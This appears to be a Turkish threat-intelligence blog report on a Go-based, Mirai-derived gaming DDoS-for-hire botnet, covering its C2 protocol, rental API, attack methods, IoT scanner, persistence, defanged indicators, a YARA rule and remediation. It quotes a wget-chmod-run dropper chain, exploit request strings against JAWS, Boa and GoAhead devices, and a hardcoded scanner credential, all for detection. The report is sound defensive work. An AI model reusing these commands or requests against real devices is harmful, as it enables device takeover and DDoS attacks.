malware · botnet · ddos · golang · iot · honeypot · gaming · mirai
Bir Oyun DDoS-Kiralık Operasyonunun İçinde
Kinryū Labs, bunun paylaşımlı bir botnet yapıcı kiti üzerinde çalışan, ticari bir oyun DDoS-kiralık operasyonu olduğunu yüksek güvenle değerlendirir. Aynı Go kod tabanı, farklı operatörler tarafından kendi C2 sunucuları ve saldırı setleriyle derlenir; burada analiz edilen filo, self-servis ve hesap kapılı bir kiralık API'nin ve yaklaşık 28 ila 32 cihazlık canlı bir bot envanterinin ön cephesini oluşturur ve oyun ile ses altyapısına karşı müşteri saldırı siparişlerini sevk eder. Ham TCP komut kanalı kimlik doğrulamasızken, bot kaydı parola kimlik doğrulamalı bir SSH kanalının arkasında kapılıdır.
Yazan Davis Zheng·
TLP:CLEAR. Yayım için onaylandı. Kinryū Labs bal küpü (honeypot) sensör ağı tarafından yakalandı. Aşağıdaki göstergeler etkisizleştirilmiştir (defanged).
Yönetici özeti
- 117 mimari boyunca benzersiz ikili
- 28-32kiralık API'de aktif bot
- 1SSH yetenekli varyant (Windows PE)
Bu, IoT solucan yeteneklerine sahip, çok mimarili bir damlalık (bins.sh) yoluyla dağıtılan ve ticari bir DDoS-kiralık hizmeti olarak işletilen, Go tabanlı bir DDoS botnet’idir. Bot, komuta-kontrol sunucusuna ham TCP üzerinden bağlanır, periyodik STATS kalp atışları gönderir ve satırla ayrılmış saldırı komutları alır. Kinryū Labs, bunun işleyen, oyun odaklı bir DDoS-kiralık botnet’i olduğunu yüksek güvenle değerlendirir.
Ayırt edici özellik bir kimlik doğrulama asimetrisidir. 9111/tcp üzerindeki komut kanalı kimlik doğrulamasızdır: TCP bağlantısı ile komut sevki arasında hiçbir parola, belirteç (token) ya da meydan okuma-yanıt geçmez. Bot kaydı, 911/tcp üzerindeki parola kimlik doğrulamalı bir SSH kanalında ayrı olarak izlenir ve kiralık API’nin bot sayacı, açık komut bağlantıları yerine bu kimlik doğrulamalı kayıtları yansıtır. Analiz edilen ikili yalnızca ham TCP kanalını konuşur ve hiçbir SSH istemcisi taşımaz, dolayısıyla kayıt ayrı bir yükleyici (loader) bileşeni tarafından ele alınır.
Bu operasyon görünür bir iş olarak yürür. Komuta-kontrol ana makinesi, self-servis ve hesap kapılı bir DDoS-kiralık API’si sunar, bot envanterinin canlı bir sayımını yayımlar ve aynı botnet kitinden inşa edilen birden çok vitrinden biridir. Birkaç saatlik izleme boyunca hizmet, müşteri saldırı siparişlerini gerçek zamanlı olarak sevk etti.
- Komut kanalı kimlik doğrulamasızdır; kayıt ise değildir.
9111'e ham TCP, kimlik doğrulaması olmadan komut kabul ederken, kiralık API'nin bot sayısı911üzerindeki parola kimlik doğrulamalı SSH oturumlarını izler. Canlı testler,9111'e bir ham TCP bağlantısının ve911üzerinde kimlik doğrulamasız bir SSH anahtar değişiminin, ikisinin de bot sayısını değiştirmeden bıraktığını doğruladı. - Filo, birçok şekilde derlenmiş tek bir Go kod tabanıdır. C2 dosya sunucusundaki on altı dosya, yedi mimari boyunca on bir benzersiz ikiliye iner; hepsi
Botnet/Botmodül yolunu ve-tags=netgo -trimpath=truederleme bayraklarını paylaşır. SSH istemcisi olan tek varyant Windows PE'dir; Linux ve IoT derlemeleri tarayıcı istismarları ve damlalık yoluyla yayılır. - Hizmet, oyun stresser pazarını hedef alır. Yöntem kümesi FiveM, Minecraft ve Discord sellerini içerir ve yakaladığımız canlı saldırı komutları neredeyse tamamen oyun ve ses altyapısına yönelikti.
- Çerçeve, Go ile yeniden yazılmış Mirai soyundan bir tasarımdır. Mirai'nin yapısal desenlerini, kimlik doğrulamasız bir TCP komut kanalını, metinle ayrılmış komutları, saldırı başına goroutine sevkini ve aynı istismar hedeflerine vuran bir IoT tarayıcısını paylaşır; oyun pazarı yöntemleri, TLS/HTTPS selleri ve üzerine eklenmiş bir kiralık API ile Go'da yeniden gerçeklenmiştir.
- Bu, özel yapım bir botnet değil, paylaşımlı bir yapıcı kittir. İkincil bir damlalık sunucusu, başka bir operatörün C2'siyle altyapı paylaşır ve bu kitten inşa edilen filolar; C2 adresi ve saldırı-yöntemi seçiminde farklılaşırken modül yolunu, tarayıcıyı, kalıcılık mekanizmalarını ve yönlendirici istismarlarını paylaşır.
Kit ve varyantları
C2, botnet filosunu sunan açık bir dizin barındırır. On altı dosya, SHA-256’ya göre on bir benzersiz ikiliye iner; x86, x86-64, ARM (v5/v6/v7), ARM64 ve MIPS’i (big- ve little-endian), artı bir Windows PE ve asgari bir saplamayı (stub) kapsar. Hepsi, Go 1.26.4 ile derlenmiş Botnet/Bot Go kod tabanını paylaşır; Windows derlemesinin SSH istemcisi dışında hiçbir üçüncü taraf içe aktarımı yoktur.
Üç nokta öne çıkar:
- Windows PE, SSH yetenekli tek varyanttır. Yalnızca
bot.exe,golang.org/x/crypto/ssh’yi içe aktarır; Linuxamd64derlemesinin tam bir dize taraması ve on bir benzersiz ikilinin tümü boyunca ikililer arası karşılaştırma, başka hiçbir yerde SSH içe aktarımı bulmadı. Linux ve IoT varyantları tarayıcı ve damlalık yoluyla yayılır. - Bir varyant, daha eski, C2’siz bir derlemedir.
x866, filonun 1.26.4’üne karşın Go 1.25.6 ile derlenmiştir, en küçük ELF varyantıdır ve görünür bir C2 adresi taşımaz; adres muhtemelen kodlanmıştır ya da çalışma zamanında sağlanır.Botnet/Botkod tabanını paylaşır ve bu onu aynı operatöre bağlar. sora.x86bir botnet değildir. Mirai “Sora” ailesini çağrıştıran bir dosya adına rağmen, aynı araç zinciriyle inşa edilmiş asgari bir Go saplamasıdır; tüm kullanıcı kodusora.x86 is runningyazdırıp çıkar, hiçbir C2 adresi, tarayıcı, saldırı yöntemi ya da kimlik bilgisi yoktur. Büyük olasılıkla dosya sunucusunda bir süreç nöbetçisi (sentinel) ya da bir tuzak (decoy) işlevi görür.
Windows PE’nin üç yakalaması yaklaşık bir haftayı kapsar: ikisi bayt bayt özdeştir, daha sonraki biri daha küçük, soyulmuş (stripped) bir yeniden derlemedir ve daha da sonraki biri, orijinalden farklı, tam özellikli bir yeniden derlemedir.
C2 protokolü
Komut kanalı, taşıma kimlik doğrulaması olmayan ham TCP’dir. Bağlantı sırası; isteğe bağlı bir yapılandırma alma (GET /config.dat, gömülü bir checkcode’a karşı doğrulanır), bir kalıcılık rutini, ardından komut portuna bir net.Dial’dır; bunun ardından bot, önce hiçbir şey yazmadan komutları okur.
- Kalp atışı:
STATS|%d|%d|%d|%d|%s\n. Sondaki alan, işletim sistemi ya da mimaridir (örneğinamd64); dört tam sayı saldırı, bağlantı, tarama ve enfeksiyon sayılarını bildirir. - Komutlar: yeni satırla ayrılmış ve boşlukla bölünmüş,
ATTACK_TYPE TARGET PORT DURATION [OPTIONS...]biçiminde. İlk alan yöntemi seçer ve sayısal alanlarstrconv.Atoiile ayrıştırılır. - Yeniden bağlanma: 120 saniyelik bir zamanlayıcı bağlantı döngüsüne yeniden girer.
- Yapılandırma: kimlik bilgileri ve yapılandırma
config.dat’tan çekilir ve özel, çok aşamalı bir XOR şifresiyle çözülür (boşluklarla başlatılan 4,078 baytlık bir tampon, ardından iki sabit anahtar baytı,0x24ve0x3Cile bayt düzeyinde XOR). Analiz sırasındaconfig.datsunulmuyordu; bu, operatörün onu devre dışı bıraktığını ya da taşıdığını gösterir.
Saldırı yöntemleri
Bot, işlev adlarından ve günlük dizelerinden kataloglanan geniş bir DDoS araç setiyle gelir:
Saldırı yöntemleri
Oyun hedefli: FiveMFlood, FiveMBypass, FiveMTCP, Minecraft, Discord.
Katman 7: HTTPSFlood (Starting Optimized HTTPS Flood on), Bypass, TLSFlood, TLSPlusFlood, TLSPlusBypassFlood, Priv7Flood (PRIV7 Attack finished).
Katman 4: TCPFlood, PPSFlood, PPSRawFlood, RawTCPFlood, RawACKFlood, ResetAttack.
Katman 3: UdpFlood, RawUDPFlood, UDPPPSFlood (Extreme UDP (PPS)), GbpsFlood (High GBPS), DNSFlood.
Özel / barındırmaya özgü: OVHFlood (OVH’yi hedefler), GameFlood, FortAttack (Fortnite), Crash, Freez.
Yalnızca Linux (PE derlemesinde yok): NtpAmp (tam NTP amplifikasyonu; PE bir saplama (stub) gönderir), HandshakeFlood (IP sahteciliğiyle ham soket TCP SYN seli), VoultFlood (sağlama toplamı hesaplamalı ham soket seli).
HTTP selleri, meşru trafiğe karışmak ve WAF filtrelemesini geçip sıvışmak için sabit kodlanmış on iki tarayıcı User-Agent dizesini döndürür ve yüksek itibarlı sitelerden (google.com, twitter.com, facebook.com, fbi.gov, reddit.com, bing.com) oluşan bir kümeden bir Referer ayarlar.
Tarayıcı ve IoT solucanı
Tarayıcı, IoT oturum açma kimlik bilgilerini kaba kuvvetle dener ve birkaç gömülü cihaz web yığınını istismar eder: JAWS DVR/IP kameraları (GET /syscmd.htm), yönlendiricilerdeki Boa web sunucusu (POST /boafrm/formSysCmd, POST /boafrm/formLogin) ve GoAhead tabanlı cihazlar (kimlik doğrulama atlatma ve yönetici-kullanıcı oluşturma için setUserLogin, yapılandırma çıkarımı için getSanvas). Ele geçirilen cihazlara wget %s -O bins.sh; chmod +x bins.sh; ./bins.sh çalıştırtılır.
Kimlik bilgileri bölünmüştür. Bir tarayıcı parolası ikilide sabit kodlanmıştır (555111111!!, muhtemelen 555 kullanıcı adıyla); ana kimlik bilgisi listesi ise çalışma zamanında config.dat’tan çekilir ve XOR ile çözülür.
Kalıcılık, süreç kamuflajının yanında dört mekanizma kullanır: /etc/systemd/system/sysd.service konumunda bir systemd birimi (daemon-reload ile), /tmp/cron_tmp üzerinden bir cron girdisi, rc.local (/etc/rc.local, /etc/rc.d/rc.local) ve init.d (/etc/init.d/boot.local). Süreç, sysd adlı bir sistem arka plan süreci (daemon) kılığına girer.
Kiralık operasyon
Komuta-kontrol ana makinesi bir iş gibi düzenlenmiştir. 22’de operatör SSH’sini, 911’de bir Go SSH bot-kayıt kanalını (parola auth, ayrı bir RSA-2048 anahtarı üzerinde), 3333’te bir DDoS-kiralık HTTP API’sini, 9111’de ham TCP komut kanalını ve 5001’de bot filosunu indirmeye sunan açık dizinli bir dosya sunucusunu açığa çıkarır.
Self-servis bir vitrin. 3333’teki API, asgari, tek uç noktalı bir booter’dır. /stats, bot envanterinin canlı bir sayımını döndürür; /api bir sipariş alır. Müşteri başına hesap kimlik bilgileri olan user ve psw’yi; hedef ve saldırı parametreleri olan host, method, time/duration ve port’un yanı sıra doğrular ve eksik ya da kimlik doğrulamasız her şeyi reddeder. Sipariş formu, kimlik doğrulamasız yoklamalardan görünürdür:
GET /stats
{"time":<unix>,"total":30}
GET /api
Missing parameters: user, psw, host, method, time/duration, port
GET /api?user=…&psw=…&host=…&method=…&time=…&port=…
Authentication failed
Sipariş formu, botun komut biçimine (ATTACK_TYPE TARGET PORT DURATION) birebir eşlenir: kimlik doğrulamalı tek bir API isteği, kayıtlı her bota kimlik doğrulamasız 9111 kanalı üzerinden sevk edilen tek bir satır olur.
Seçilmiş bir envanter. /stats, izlenen pencere boyunca sürekli değişimle 28 ila 32 aktif bot bildirdi. O sayaç, ham komut bağlantıları yerine 911 üzerindeki parola kimlik doğrulamalı kayıtları izlediği için, elenmiş bir envanter sayımıdır. Kayıt ile komut sevkinin iki kanala bölünmesinin operasyonel nedeni budur: hangi botların hizmete ait olduğuna karar veren bir kapı, onları sürmek için açık bir kanal.
Madencilikten DDoS’a bir dönüş. İkincil damlalık sunucusu, DDoS filosunun yanında boşaltılmış bir miner.sh taşır; bu, o zamandan beri kaldırılmış bir kripto-madenci bileşeninin kalıntısıdır. Operatör, kripto-madencilikten DDoS satmaya geçmiş görünüyor.
Sipariş karşılama, canlı gözlemlendi
Tersine mühendislikle çıkarılan protokolü, pasif bir izleyiciyle canlı C2’ye karşı doğruladık ve hizmetin çalışmasını izledik. C2 çoğunlukla boştaydı; birkaç saatlik bir oturum sırasında on üç saldırı komutu sevk etti; her biri filoya itilen bir müşteri siparişiydi.
Siparişler neredeyse tamamen oyun ve ses altyapısına yönelikti: ağırlıklı olarak Suudi Arabistan’da Google Cloud üzerindeki FiveM (GTA V) oyun sunucuları, Cloudflare üzerindeki Discord ses uç noktaları ve bir çift web sunucusu. Bunun, belirli bir müşteri çatışması üzerine hareket eden, oyun odaklı bir stresser hizmeti olduğunu değerlendiriyoruz. Sevk deseni bir hizmet teslimi gibi okunur: ürün kademelerine benzeyen kademeli saldırı süreleri (20 sn yoklamalar, 30 sn standart, 60 sn sürekli), yöntem tırmanışı (bir hedefi test etmek için jenerik bir sel, ardından ona karşı protokole özgü bir yöntem), sessizliğin izlediği eşleştirilmiş ve patlamalı sevk ve bir Discord sunucusunun yük dengeli sesinin arkasındaki her iki IP’yi de çifte vurma.
Paylaşımlı bir yapıcı kit
Bu, özel yapım bir botnet değildir. Farklı operatörlerin özelleştirip kendi hizmeti olarak işlettiği bir botnet kitinin bir derlemesidir. Kitin en net görünümü, aynı kod tabanında çalışan önceki raporumuzdaki filoyla, Çok Platformlu Bir Go DDoS Kiralık-Botnet’i, yan yana bir karşılaştırmadır:
| Önceki rapor | Bu operasyon | |
|---|---|---|
| Kod tabanı | Botnet/Bot Go kiti | aynı Botnet/Bot Go kiti |
| Teslim | Jenkins RCE + IoT tarayıcısı | Jenkins RCE + IoT tarayıcısı |
| Tarayıcı, kalıcılık, yönlendirici istismarları | paylaşımlı | paylaşımlı |
| C2 adresi | 185.226.93[.]242 | 5.175.140[.]178 |
| Saldırı seti ve pazar | genel amaçlı DDoS | oyun stresser (FiveM, Minecraft, Discord) |
Filolar, Botnet/Bot modül yolunu, aynı tarayıcı ve IoT istismarlarını, aynı kalıcılık mekanizmalarını ve aynı damlalığı paylaşır ve örtüşen altyapı üzerinde çalışır: buradaki ikincil damlalık sunucusu (185.226.93[.]242), önceki raporun C2’sidir. Farklı olan, saldırı seti ve pazardır. O diğer filo genel amaçlı bir sel seti derler; buradaki operatör ise oyun yöntemlerini derler ve doğrudan oyun stresser pazarına yönelik kiralık sipariş API’sini gönderir. Birlikte bir yapıcı-kit ekonomisine işaret ederler: paylaşımlı bir kod tabanı, yeniden satılmış ya da elden ele geçmiş, her operatör kendi hedefleriyle bir vitrin kurar.
İhlal göstergeleri
Saldırgan altyapısı etkisizleştirilmiştir. Özetler (hash) birebir yeniden üretilmiştir.
Ağ
| Gösterge | Bağlam |
|---|---|
5.175.140[.]178:911/tcp | Bot kaydı (Go SSH, parola auth; kiralık API tarafından sayılır) |
5.175.140[.]178:9111/tcp | Komut sevki (ham TCP, kimlik doğrulamasız; sayılmaz) |
5.175.140[.]178:3333/tcp | DDoS-kiralık API’si (/stats, /api) |
5.175.140[.]178:5001/tcp | Açık dizin dosya sunucusu (bot filosu + damlalık) |
5.175.140[.]178:22/tcp | Operatör SSH (OpenSSH 9.7p1 Ubuntu) |
hxxp://5.175.140[.]178:9111/config.dat | Ham TCP üzerinden yapılandırma alma |
hxxp://5.175.140[.]178:5001/bins.sh | Çok mimarili damlalık (birincil) |
185.226.93[.]242:1001/tcp | İkincil damlalık (ayrı bir operatörün C2’si) |
hxxp://185.226.93[.]242:1001/bins.sh, …/binns.sh | Damlalık (ikincil + yazım hatası varyantı) |
217.60.195[.]229 | Örneği teslim eden kaynak adres |
5.175.140[.]0/24 | Barındırma tahsisi |
Tarayıcı / yayılma dizeleri
GET /syscmd.htm HTTP/1.1 (JAWS DVR/IP camera RCE)
POST /boafrm/formSysCmd HTTP/1.1 (Boa router RCE)
POST /boafrm/formLogin HTTP/1.1 (Boa login)
GET /login.htm HTTP/1.1 (router login page)
{"topicurl":"setting/setUserLogin",...} (GoAhead auth bypass / admin-user creation)
{"topicurl":"setting/getSanvas"} (GoAhead config extraction)
GET /config.dat HTTP/1.1 (remote config fetch)
wget %s -O bins.sh; chmod +x bins.sh; ./bins.sh
proxy/tlsplusbypass.txt
Ana makine eserleri
Process name: sysd
systemd: /etc/systemd/system/sysd.service (+ daemon-reload)
cron: /tmp/cron_tmp
rc.local: /etc/rc.local, /etc/rc.d/rc.local
init.d: /etc/init.d/boot.local
Hardcoded scanner credential: 555111111!! (likely username 555)
Dosyalar (SHA-256), aksi belirtilmedikçe Go 1.26.4
Tam dosya özetleri (hash)
bot.exe (Windows PE, only SSH-capable variant), captures:
6da756970a411dade9db3c921ef4cdade550f317703d0fc12090a15d8c6778d4 (6,253,056 bytes)
36f1b06c942271496d8a9e26bde8d5ddacea82965ea3232ea99804170c1e4e25 (4,933,632 bytes, stripped rebuild)
4de4621f66780e1400bf3c55f146f84f6d77bbdd3a401451f3b7f16d674e3804 (6,020,608 bytes, full rebuild)
Linux amd64: 8ddad5973d0ed85ba2babe36121d16fa9307b8804206f645630b10f772010680
Linux i386/x86 (byte-identical): d862b2589aef9611807dfe1f27c4544120dd76f029afc006038ad5b81d57086e
Linux ARM (android_arm = arm = arm7 = armv7l): 523c4096458bc3ac42e2bc92a8cf5a36b7bab1c75a2cc0e1ab3f9e5db3c33c82
Linux ARM5: 362c5394a0fa1e87929da5967ec779dcf8c7bbcbdd9417391349e9aa6c2cc4b3
Linux ARM6: 2709ce2627b6aed42166bc7cdf14f9b22855ee7a99f9eb76febb1ec9c8d22b41
Linux ARM64 (android_arm64 = arm64): 428de403a62e4e8ebc2e54af94d36e43e6b26d5e41bbc0d81b39c3e19f4b1d2a
Linux MIPS (BE): 6500fef3003e5d2d7ef6fbdbe6219e93f31082c232ce2769f206d1f425c75f21
Linux MIPS (LE): 3e02755cd326c9c724abc730a40ae0cccebfa23614fbbd566a08b71a1f5f2fdc
x866 (Go 1.25.6, no visible C2 IP): f223bc55bad1bf9ba6ae9ba11f58b338bc00e8e0d4b50311b5b5c42a09a7c122
sora.x86 (Go stub, not a botnet): a1a9e0a94780a05097544b62eb13db7444b29033fbe1d30a16f2d2334ec424ad
sora.x86 SHA-1: efa32ae20b15f835b96da5ce9e83332b83cbd098
sora.x86 MD5: 3f95cf1ed17f7e00a7be4f5cf12e0088
x86/i386, ARM7 grubu (android_arm/arm/arm7/armv7l) ve android_arm64/arm64 bayt bayt özdeştir; arm6, aynı boyuta rağmen ARM7 grubundan farklıdır (farklı GOARM kod üretimi).
Barındırma
Provider: Ryzehosting
Maintainer: GHOSTNET-MNT
Abuse: [email protected]
Reverse DNS: static.178.140.175[.]5.clients.ryzehosting.com
IP allocated: 2026-03-15
Tespit
Dizeler kararlı ve karartılmamıştır, dolayısıyla imzalar sade ve doğrudandır. Aşağıdaki aday YARA kuralı ayırt edici dizelerden oluşturulmuştur; dağıtımdan önce doğrulayın.
rule go_gaming_ddos_bot_candidate
{
meta:
description = "Candidate: Go DDoS-for-hire botnet (Botnet/Bot codebase, gaming loadout)"
author = "Kinryu Labs honeypot CTI"
reference = "6da75697...78d4" // full SHA-256 in the IOC table
tlp = "CLEAR"
strings:
$mod = "Botnet/Bot" ascii
$cnc1 = "Connecting to CNC" ascii
$cnc2 = "Connected to CNC" ascii
$stats = "STATS|" ascii
$svc = "/etc/systemd/system/sysd.service" ascii
$cron = "/tmp/cron_tmp" ascii
$fivem = "Starting FiveM Flood on" ascii
$cred = "555111111!!" ascii
condition:
($mod and 2 of ($cnc1, $cnc2, $stats)) or
($svc and $cron) or
(2 of ($fivem, $cred, $stats))
}
Ek tespit mantığı:
# STATS heartbeat on egress (regex)
STATS\|[0-9]+\|[0-9]+\|[0-9]+\|[0-9]+\|.+\n
# IoT exploit payloads (inbound)
GET /syscmd.htm HTTP/1.1
{"topicurl":"setting/setUserLogin","username":"...
{"topicurl":"setting/getSanvas"}
# Dropper execution chain
wget %s -O bins.sh; chmod +x bins.sh; ./bins.sh
Düzeltme
- Jenkins’i ya da diğer CI/CD ve yönetim arayüzlerini internete açmayın. Teslim vektörü buydu.
- JAWS, Boa ve GoAhead tabanlı IoT cihazlarını yamalayın ya da bölümleyin ve yönetim arayüzlerine dış erişimi engelleyin. Bunlar tarayıcının yayılma hedefleridir.
- C2 ve damlalık altyapısını çevrede engelleyin (
5.175.140[.]178ve185.226.93[.]242:1001damlalığı) veconfig.datalımında vebins.shçalıştırma zincirinde uyarın. - Kalıcılık eserlerinde ve
sysdsüreç adında, ve çıkıştaki (egress)STATS|kalp atışı deseninde uyarın.
MITRE ATT&CK eşlemesi
| Taktik | Teknik |
|---|---|
| Initial Access | T1190 Exploit Public-Facing Application (Jenkins teslimi; JAWS / Boa / GoAhead IoT web yığını istismarları) |
| Execution | T1059.004 Command and Scripting Interpreter: Unix Shell (bins.sh damlalığı) |
| Persistence | T1543.002 Systemd Service (sysd.service); T1053.003 Cron; T1037.004 RC Scripts (rc.local); init.d önyükleme betiği |
| Defense Evasion | T1036 Masquerading (süreç adı sysd; tarayıcı User-Agent ve referer sahteciliği); T1027 Obfuscated Files or Information (XOR ile kodlanmış config.dat) |
| Credential Access | T1110 Brute Force (IoT cihaz oturum açma) |
| Discovery | T1046 Network Service Scanning (IoT tarayıcısı) |
| Command and Control | T1071.001 Web Protocols (config.dat); T1571 Non-Standard Port (911, 9111, 3333, 5001); T1105 Ingress Tool Transfer (çok mimarili damlalık) |
| Impact | T1498.001 Direct Network Flood (UDP / TCP / PPS / FiveM / Discord); T1498.002 Reflection Amplification (DNS / NTP) |
Metodoloji ve notlar
- Analiz, statik tersine mühendislik artı pasif canlı-protokol doğrulamasıdır; ikililer hiçbir zaman çalıştırılmadı.
- Göstergeler etkisizleştirilmiştir ve özetler (hash) birebir yeniden üretilmiştir.
- Örnekler, diğer araştırmacılara ve savunuculara talep üzerine sunulur. Kim olduğunuza ve ne için gerektiğine dair kısa bir notla [email protected] adresine yazın.